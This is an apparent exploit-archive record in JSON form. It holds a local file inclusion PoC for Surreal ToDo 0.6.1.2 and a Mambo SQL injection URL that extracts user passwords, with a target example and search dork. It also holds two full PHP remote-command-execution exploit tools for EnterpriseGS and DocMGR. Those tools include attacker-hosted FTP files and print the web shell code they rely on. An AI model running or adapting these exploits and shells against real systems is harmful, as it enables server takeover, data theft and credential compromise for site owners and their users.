ID 1337DAY-ID-31603
Type zdt
Reporter Ihsan Sencan
Modified 2018-11-14T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?content=[FILE]
#
GET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:58:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1885
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# 0day.today [2018-11-19] #
{"id": "1337DAY-ID-31603", "bulletinFamily": "exploit", "title": "Surreal ToDo 0.6.1.2 - Local File Inclusion Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-11-14T00:00:00", "modified": "2018-11-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31603", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-11-19T19:12:00", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "469a28a102aa45d0b863d1a554a9ee8b"}, {"key": "modified", "hash": "9b8f1b8b431988936640ca43cc31c880"}, {"key": "published", "hash": "9b8f1b8b431988936640ca43cc31c880"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "8340c05472fc34999bf0328d1c6eb411"}, {"key": "sourceHref", "hash": "54c0a18c31fd9d387c97936edfb949f2"}, {"key": "title", "hash": "13b645b0cb592288ca9a094a06c14ba9"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "a95c00a3f1b6f9e2d3bf5e2c20e1af961f285909e23fa12bdc62102a57298b89", "viewCount": 259, "enchantments": {"score": {"value": -1.3, "vector": "NONE", "modified": "2018-11-19T19:12:00"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-1885", "1337DAY-ID-253", "1337DAY-ID-251"]}], "modified": "2018-11-19T19:12:00"}, "vulnersScore": -1.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/31603", "sourceData": "# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://getsurreal.com/surrealtodo\r\n# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip\r\n# Version: 0.6.1.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/index.php?content=[FILE]\r\n# \r\nGET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Wed, 07 Nov 2018 23:58:36 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nContent-Length: 1885\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-11-19] #"}
{"zdt": [{"lastseen": "2018-04-04T19:34:00", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-05-17T00:00:00", "published": "2007-05-17T00:00:00", "id": "1337DAY-ID-1885", "href": "https://0day.today/exploit/description/1885", "type": "zdt", "title": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability", "sourceData": "===============================================================\r\nMambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\n-------------------------------\r\n\r\nMambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln\r\n\r\n-------------------------------------------------------------\r\n\r\nExploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*\r\n\r\nExample:http://www.tnrb.net/\r\n\r\n-------------------------------------------------------------\r\n\r\ngoogle dork: inurl:index.php?option=com_yanc\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1885"}, {"lastseen": "2018-02-07T01:13:34", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-02-13T00:00:00", "published": "2006-02-13T00:00:00", "id": "1337DAY-ID-253", "href": "https://0day.today/exploit/description/253", "type": "zdt", "title": "EnterpriseGS <= 1.0 rc4 Remote Commands Execution Exploit", "sourceData": "=========================================================\r\nEnterpriseGS <= 1.0 rc4 Remote Commands Execution Exploit\r\n=========================================================\r\n\r\n\r\n\r\n\r\n\r\n<?php\r\n# ---egs_10rc4_php5_incl_xpl.php 17.57 13/02/2006 #\r\n# #\r\n# EGS Enterprise Groupware System <=1.0 rc4 remote commands execution exploit #\r\n# coded by rgod #\r\n# #\r\n# -> works against PHP5 #\r\n# usage: launch from Apache, fill in requested fields, then go! #\r\n# #\r\n# Sun-Tzu: \"Thus the energy developed by good fighting men is as the momentum #\r\n# of a round stone rolled down a mountain thousands of feet in height. So #\r\n# much on the subject of energy.\" #\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\", 2);\r\nob_implicit_flush (1);\r\n\r\necho'<html><head><title> ******** EGS <= 1.0 rc4 remote commands execution *****\r\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\r\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\r\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\r\n{background-color: #FFFFFF !important} input {background-color: #303030\r\n!important} option { background-color: #303030 !important} textarea\r\n{background-color: #303030 !important} input {color: #1CB081 !important} option\r\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\r\n{background-color: #303030 !important} select {font-weight: normal; color:\r\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\r\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\r\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\r\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\r\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\r\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\r\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\r\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\r\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\r\n******** EGS <= 1.0 rc4 remote commands execution ***** </p><p class=\"Stile6\">a\r\nscript by rgod at <a href=\"http://retrogod.altervista.org\"target=\"_blank\">\r\nhttp://retrogod.altervista.org</a> </p> <table width=\"84%\"><tr><td width=\"43%\">\r\n<form name=\"form1\" method=\"post\" action=\"'.$_SERVER[PHP_SELF].'\"> <p><input\r\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* target (ex:www.sitename.com)\r\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\r\n/EGS/ or just / ) </span></p><p><input type=\"text\" name=\"cmd\"> <span\r\nclass=\"Stile5\"> * specify a command </span> </p> <p> <input type=\"text\"\r\nname=\"FTP_LOCATION\"><span class=\"Stile5\"> * specify an ftp resource (ex: ftp://u\r\nsername:[email\u00a0protected]/shell.php) </span> </p><p> <input type=\"text\"\r\nname=\"port\"><span class=\"Stile5\">specify a port other than 80 (default value)\r\n</span> </p><p><input type=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exp\r\nloit through an HTTP proxy (ip:port) </span> </p> <p> <input type=\"submit\"\r\nname=\"Submit\" value=\"go!\"></p></form></td></tr></table></body></html>';\r\n\r\nfunction show($headeri)\r\n{\r\n$ii=0;\r\n$ji=0;\r\n$ki=0;\r\n$ci=0;\r\necho '<table border=\"0\"><tr>';\r\nwhile ($ii <= strlen($headeri)-1)\r\n{\r\n$datai=dechex(ord($headeri[$ii]));\r\nif ($ji==16) {\r\n $ji=0;\r\n $ci++;\r\n echo \"<td>&nbps;&nbps;</td>\";\r\n for ($li=0; $li<=15; $li++)\r\n { echo \"<td>\".htmlentities($headeri[$li+$ki]).\"</td>\";\r\n\t\t\t }\r\n $ki=$ki+16;\r\n echo \"</tr><tr>\";\r\n }\r\nif (strlen($datai)==1) {echo \"<td>0\".htmlentities($datai).\"</td>\";} else\r\n{echo \"<td>\".$datai.\"</td> \";}\r\n$ii++;\r\n$ji++;\r\n}\r\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\r\n { echo \"<td>  </td>\";\r\n }\r\n\r\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\r\n { echo \"<td>\".htmlentities($headeri[$li]).\"</td>\";\r\n\t\t\t }\r\necho \"</tr></table>\";\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacket() //if you have sockets module loaded, 2x speed! if not,load\r\n\t\t //next function to send packets\r\n{\r\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\r\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if ($socket < 0) {\r\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\r\n }\r\n\t else\r\n \t\t { $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n echo \"OK.<br>\";\r\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\r\n if ($proxy=='')\r\n\t\t {\r\n\t\t $result = socket_connect($socket, $host, $port);\r\n\t\t }\r\n\t\t else\r\n\t\t {\r\n\r\n\t\t $parts =explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n\t\t $result = socket_connect($socket, $parts[0],$parts[1]);\r\n\t\t }\r\n\t\t if ($result < 0) {\r\n echo \"socket_connect() failed.\\r\\nReason: (\".$result.\") \" . socket_strerror($result) . \"<br><br>\";\r\n }\r\n\t else\r\n\t\t {\r\n echo \"OK.<br><br>\";\r\n $html= '';\r\n socket_write($socket, $packet, strlen($packet));\r\n echo \"Reading response:<br>\";\r\n while ($out= socket_read($socket, 2048)) {$html.=$out;}\r\n echo nl2br(htmlentities($html));\r\n echo \"Closing socket...\";\r\n socket_close($socket);\r\n\r\n\t\t\t\t }\r\n }\r\n}\r\nfunction sendpacketii($packet)\r\n{\r\nglobal $proxy, $host, $port, $html, $proxy_regex;\r\nif ($proxy=='')\r\n {$ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) { echo 'No response from '.htmlentities($host);\r\n\t\t\tdie; }\r\n }\r\n else\r\n {\r\n\t $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n\t $parts=explode(':',$proxy);\r\n\t echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n\t $ock=fsockopen($parts[0],$parts[1]);\r\n\t if (!$ock) { echo 'No response from proxy...';\r\n\t\t\tdie;\r\n\t\t }\r\n\t }\r\nfputs($ock,$packet);\r\nif ($proxy=='')\r\n {\r\n\r\n $html='';\r\n while (!feof($ock))\r\n {\r\n $html.=fgets($ock);\r\n }\r\n }\r\nelse\r\n {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\r\n {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\nfclose($ock);\r\necho nl2br(htmlentities($html));\r\n}\r\n\r\n$host=$_POST[host];$path=$_POST[path];\r\n$port=$_POST[port];$FTP_LOCATION=$_POST[FTP_LOCATION];\r\n$cmd=urlencode($_POST[cmd]);$proxy=$_POST[proxy];\r\necho \"<span class=\\\"Stile5\\\">\";\r\n\r\nif (($host<>'') and ($path<>'') and ($cmd<>'') and ($FTP_LOCATION<>''))\r\n{\r\n $port=intval(trim($port));\r\n if ($port=='') {$port=80;}\r\n if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n $host=str_replace(\"\\r\",\"\",$host);$host=str_replace(\"\\n\",\"\",$host);\r\n $path=str_replace(\"\\r\",\"\",$path);$path=str_replace(\"\\n\",\"\",$path);\r\n\r\n # STEP 1 -> Call the Fiyspray 0.9.7 installation script...\r\n $packet =\"GET \".$p.\"modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User-Agent: Rumours-Agent\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n show($packet);\r\n sendpacketii($packet);\r\n\r\n $temp=explode(\"basedir\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $basedir=$temp2[0];\r\n echo \"basedir -> \".htmlentities($basedir).\"<BR>\";\r\n $temp=explode(\"dbhost\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_HOST=$temp2[0];\r\n echo \"DB HOST -> \".htmlentities($DB_HOST).\"<BR>\";\r\n $temp=explode(\"dbname\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_NAME=$temp2[0];\r\n echo \"DB NAME -> \".htmlentities($DB_NAME).\"<BR>\";\r\n $temp=explode(\"dbuser\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_USER=$temp2[0];\r\n echo \"DB USER -> \".htmlentities($DB_USER).\"<BR>\";\r\n $temp=explode(\"dbpass\\\" value=\\\"\",$html);\r\n $temp2=explode(\"\\\"\",$temp[1]);\r\n $DB_PASS=$temp2[0];\r\n echo \"DB PASS -> \".strip_tags(htmlentities($DB_PASS)).\"<BR>\";\r\n $temp=explode(\"Set-Cookie: \",$html);\r\n $temp2=explode(\" \",$temp[1]);\r\n $COOKIE=$temp2[0];\r\n echo \"COOKIE -> \".htmlentities($COOKIE).\"<BR>\";\r\n\r\n # STEP 2 -> submit the ftp resource with shell code inside...\r\n $data =\"basedir=\".urlencode($basedir);\r\n $data.=\"&adodbpath=\".urlencode($FTP_LOCATION);\r\n $data.=\"&dbtype=pgsql\";\r\n $data.=\"&dbuser=\".urlencode($DB_USER);\r\n $data.=\"&dbname=\".urlencode($DB_NAME);\r\n $data.=\"&dbhost=\".urlencode($DB_HOST);\r\n $data.=\"&dbpass=\".urlencode($DB_PASS);\r\n $packet =\"POST \".$p.\"modules/projects/sql/install-0.9.7.php?p=3 HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User-Agent: Science Traveller International 1X/1.0\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\r\n $packet.=\"Cookie: \".$COOKIE.\"\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n show($packet);\r\n sendpacketii($packet);\r\n\r\n # STEP 3 -> Launch commands...\r\n $packet =\"GET \".$p.\"modules/projects/sql/install-0.9.7.php?p=4&cmd=\".$cmd.\" HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User Agent: Googlebot 1.0\\r\\n\";\r\n $packet.=\"Cookie: \".$COOKIE.\"\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n show($packet);\r\n sendpacketii($packet);\r\n if (eregi(\"HiMaster!\",$html)) {echo \"Exploit succeeded...\";}\r\n else {echo \"Exploit failed...\";}\r\n}\r\nelse\r\n{echo \"Note: inside shell.php you need this code: <br>\";\r\n echo nl2br(htmlentities(\"\r\n <?php\r\n ob_clean();echo\\\"HiMaster!\\\";ini_set(\\\"max_execution_time\\\",0);phpinfo();passthru(\\$HTTP_GET_VARS[cmd]);die;\r\n ?>\r\n \")).\"<br>\";\r\n echo \"Fill * required fields, optionally specify a proxy...\";}\r\n echo \"</span>\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/253"}, {"lastseen": "2018-04-12T21:48:11", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2006-02-11T00:00:00", "published": "2006-02-11T00:00:00", "id": "1337DAY-ID-251", "href": "https://0day.today/exploit/description/251", "type": "zdt", "title": "DocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit", "sourceData": "================================================================\r\nDocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit\r\n================================================================\r\n\r\n\r\n\r\n\r\n\r\n<?php\r\n# ---docmgr_0542_incl_xpl.php 0.30 12/02/2006 #\r\n# #\r\n# DocMGR <= 0.54.2 remote commands execution exploit #\r\n# coded by rgod #\r\n# #\r\n# -> works against PHP5, with short_open_tag = On and register_globals = On #\r\n# usage: launch from Apache, fill in requested fields, then go! #\r\n# #\r\n# Sun-Tzu: \"The quality of decision is like the well-timed swoop of a falcon #\r\n# which enables it to strike and destroy its victim.\" #\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",0);\r\nob_implicit_flush (1);\r\n\r\necho'<html><head><title> ** DocMGR <= 0.54.2 remote commands execution exploit**\r\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\r\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\r\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\r\n{background-color: #FFFFFF !important} input {background-color: #303030\r\n!important} option { background-color: #303030 !important} textarea\r\n{background-color: #303030 !important} input {color: #1CB081 !important} option\r\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\r\n{background-color: #303030 !important} select {font-weight: normal; color:\r\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\r\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\r\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\r\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\r\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\r\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\r\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\r\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\r\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\r\n** DocMGR <= 0.54.2 remote commands execution exploit** </p><p class=\"Stile6\">a\r\nscript by rgod at <a href=\"http://retrogod.altervista.org\"target=\"_blank\">\r\nhttp://retrogod.altervista.org</a> </p> <table width=\"84%\"><tr><td width=\"43%\">\r\n<form name=\"form1\" method=\"post\" action=\"'.$_SERVER[PHP_SELF].'\"> <p><input\r\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* target (ex:www.sitename.com)\r\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\r\n/DocMgr/ or just / ) </span></p><p><input type=\"text\" name=\"cmd\"> <span\r\nclass=\"Stile5\"> * specify a command </span> </p> <p> <input type=\"text\"\r\nname=\"FTP_LOCATION\"><span class=\"Stile5\"> * specify an ftp location (ex: ftp://u\r\nsername:[email\u00a0protected])</span> </p> <p> <input type=\"text\" name=\"port\">\r\n<span class=\"Stile5\">specify a port other than 80 (default value)</span> </p>\r\n<p><input type=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exploit through\r\nan HTTP proxy (ip:port) </span> </p> <p> <input type=\"submit\" name=\"Submit\"\r\nvalue=\"go!\"></p></form></td></tr></table></body></html>';\r\n\r\nfunction show($headeri)\r\n{\r\n $ii=0;$ji=0;$ki=0;$ci=0;\r\n echo '<table border=\"0\"><tr>';\r\n while ($ii <= strlen($headeri)-1){\r\n $datai=dechex(ord($headeri[$ii]));\r\n if ($ji==16) {\r\n $ji=0;\r\n $ci++;\r\n echo \"<td>&nbps;&nbps;</td>\";\r\n for ($li=0; $li<=15; $li++) {\r\n echo \"<td>\".htmlentities_($headeri[$li+$ki]).\"</td>\";\r\n\t\t}\r\n $ki=$ki+16;\r\n echo \"</tr><tr>\";\r\n }\r\n if (strlen($datai)==1) {\r\n echo \"<td>0\".htmlentities($datai).\"</td>\";\r\n }\r\n else {\r\n echo \"<td>\".htmlentities($datai).\"</td> \";\r\n }\r\n $ii++;$ji++;\r\n }\r\n for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {\r\n echo \"<td>  </td>\";\r\n }\r\n for ($li=$ci*16; $li<=strlen($headeri); $li++) {\r\n echo \"<td>\".htmlentities($headeri[$li]).\"</td>\";\r\n }\r\n echo \"</tr></table>\";\r\n}\r\n\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacket() //2x speed\r\n{\r\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\r\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if ($socket < 0) {\r\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\r\n }\r\n else {\r\n $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n echo \"OK.<br>\";\r\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\r\n if ($proxy=='') {\r\n $result = socket_connect($socket, $host, $port);\r\n }\r\n else {\r\n $parts =explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n $result = socket_connect($socket, $parts[0],$parts[1]);\r\n }\r\n if ($result < 0) {\r\n echo \"socket_connect() failed.\\r\\nReason: (\".$result.\") \" . socket_strerror($result) . \"<br><br>\";\r\n }\r\n else {\r\n echo \"OK.<br><br>\";\r\n $html= '';\r\n socket_write($socket, $packet, strlen($packet));\r\n echo \"Reading response:<br>\";\r\n while ($out= socket_read($socket, 2048)) {$html.=$out;}\r\n echo nl2br(htmlentities($html));\r\n echo \"Closing socket...\";\r\n socket_close($socket);\r\n }\r\n }\r\n}\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.htmlentities($host); die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid prozy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);echo nl2br(htmlentities($html));\r\n}\r\n\r\n$host=$_POST[host];$path=$_POST[path];\r\n$port=$_POST[port];$FTP_LOCATION=urlencode($_POST[FTP_LOCATION]);\r\n$cmd=urlencode($_POST[cmd]);$proxy=$_POST[proxy];\r\necho \"<span class=\\\"Stile5\\\">\";\r\n\r\nif (($host<>'') and ($path<>'') and ($cmd<>'') and ($FTP_LOCATION<>''))\r\n{\r\n $port=intval(trim($port));\r\n if ($port=='') {$port=80;}\r\n if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n $host=str_replace(\"\\r\",\"\",$host);$host=str_replace(\"\\n\",\"\",$host);\r\n $path=str_replace(\"\\r\",\"\",$path);$path=str_replace(\"\\n\",\"\",$path);\r\n\r\n # STEP X -> One and unique, arbitrary remote inclusion ...\r\n $packet=\"GET \".$p.\"modules/center/admin/accounts/process.php?cmd=$cmd&includeModule=suntzu\";\r\n $packet.=\"&siteModInfo[suntzu][module_path]=$FTP_LOCATION/ HTTP/1.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"User-Agent: MiracleAlphaTest\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n show($packet);\r\n sendpacketii($packet);\r\n if (eregi(\"HiMaster!\",$html)) {echo \"Exploit succeeded...\";}\r\n\t\t\t else {echo \"Exploit failed...\";}\r\n}\r\nelse\r\n{echo \"Note: on ftp://somehost.com you need this code<br>\r\n in process.php or function.php :<br>\";\r\n echo nl2br(htmlentities(\"\r\n <?php\r\n echo\\\"HiMaster!\\\";ini_set(\\\"max_execution_time\\\",0);passthru(\\$cmd);\r\n ?>\r\n \")).\"<br>\";\r\n echo \"Fill * required fields, optionally specify a proxy...\";}\r\necho \"</span>\";\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/251"}]}